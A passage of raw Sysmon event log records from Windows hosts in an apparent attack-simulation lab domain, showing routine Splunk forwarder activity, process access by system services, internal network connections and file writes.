Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081878Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.855{2FDD8D40-B2FB-615A-5801-00000000FD01}1168C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000081877Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:29.235{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50061-false10.0.1.12-8089- 10341000x800000000000000081876Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2FB-615A-5701-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081875Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081874Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081873Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081872Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081871Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081870Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081869Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081868Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081867Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081866Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC98-615A-0500-00000000FD01}412428C:\Windows\system32\csrss.exe{2FDD8D40-B2FB-615A-5701-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081865Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.354{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B2FB-615A-5701-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081864Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.355{2FDD8D40-B2FB-615A-5701-00000000FD01}3264C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081863Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.307{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDAB568B932B1A0EB26E8C11D31A8988,SHA256=5E11E0BAD781D709F5982D4BECC04B1C22AB9A67EB59ED33C798F3A11141E9FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104007Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:31.285{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64AEE0E7F96740D2BEEDA18162BB21EA,SHA256=9B052569507CC16E0ABF8EFEE771313C59595DBDCE4B8F9C771DE81B606782AE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104010Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:31.444{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49568-false10.0.1.12-8000- 23542300x8000000000000000104009Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:32.316{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4705B7F7B5245BDDA679BC93567CAB28,SHA256=1434CEAA222186C467D95814C9627E8DE3E78192D513D738DEBBD682915BBFED,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081894Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:32.807{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5264D8A6E2116C08AEF1EE4F7CCC52C,SHA256=5039A86A07F588B8741FEE3AFEF1018759992A0B0D1ABA3345E323B180A1624F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081893Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:32.354{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=890800180579C02E313A20C38F93FC1E,SHA256=E65F0B86084935BA02D2812BAC24000B6E0810D7745808CD9F4C055522CB0A6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081892Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:32.354{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B831ECAE67AD99EC2061D4790862DEDF,SHA256=7F9975545EB4EB828E4386F212DEE05BFD5EA11AEC62001EE1AF55FB69364DEF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081891Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:32.135{2FDD8D40-B2FB-615A-5801-00000000FD01}11682264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000104008Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:32.050{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=76710428959A4E843EAA054029FCACA0,SHA256=B5D774C6A19CB38527D765A4E51D3980AFEBA69574B540C6F972E231D3A1ED94,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104011Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:33.316{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87AB49EE0501DB265A82791F92004729,SHA256=08DA29EE3992FEF5A08C46F4859E45FFF2D502CFDDECD98E3579FF9FB372E46D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081909Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:31.751{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50062-false10.0.1.12-8000- 23542300x800000000000000081908Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.354{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B51595EA89FC1CFE9B02FC8398B09D5E,SHA256=75D49B789C2D9AB84AD1E7640F1AD20380DBE043B3962FB4F2583F1D41C4AFBE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081907Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B2FD-615A-5901-00000000FD01}3112C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081906Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081905Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081904Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081903Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:33.151{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 